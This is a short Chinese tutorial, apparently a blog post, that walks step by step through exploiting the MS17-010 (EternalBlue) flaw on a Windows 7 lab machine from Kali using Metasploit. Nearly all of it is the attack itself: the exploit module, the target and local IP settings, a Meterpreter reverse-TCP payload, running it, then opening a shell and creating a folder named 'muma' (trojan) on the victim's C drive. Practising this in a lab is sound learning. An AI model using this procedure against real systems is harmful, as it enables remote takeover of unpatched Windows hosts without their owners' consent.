环境:
靶机:win7(x64)
攻击机:linux2020.2
(在内网中测试)
步骤:
一、在kali终端输入:msfconsole
(启动有点久)
二、直接输入指令搜索:search ms17_010
(之前的永恒之蓝)
下一步用下面第二个模块
三、通过use来使用该模块,所以输入指令 :
use exploit/windows/smb/ms17_010_eternalblue
得到如下,可以看到RHOSTS(目标主机ip)和LHOST (本地ip)两个参数需要配置,其他的默认,目标端口已经默认为445。
三、现在开始配置RHOSTS、LHOST、payload
输入以下指令配置:
1、set RHOSTS 192.168.0.15
2、set LHOST 192.168.0.14
3、set payload windows/x64/meterpreter/reverse_tcp
(这里用的是反向连接,比较常用)
四、配置成功后输入show options
查看配置
可以看到下图已经配置成功
五、接下来就可以run了
输入run
回车等待一会
六、看到下图已经拿到权限。
最后输入shell
登录到目标机,就可以对目标机进行各种操控,例如查看文件,创建文件夹等等。
例如:
输入指令cd C:\
进入C盘目录下
输入指令md muma
创建名为muma的文件夹
输入指令dir
查看C盘文件,下图可以看到已经在目标机C盘里创建了muma文件夹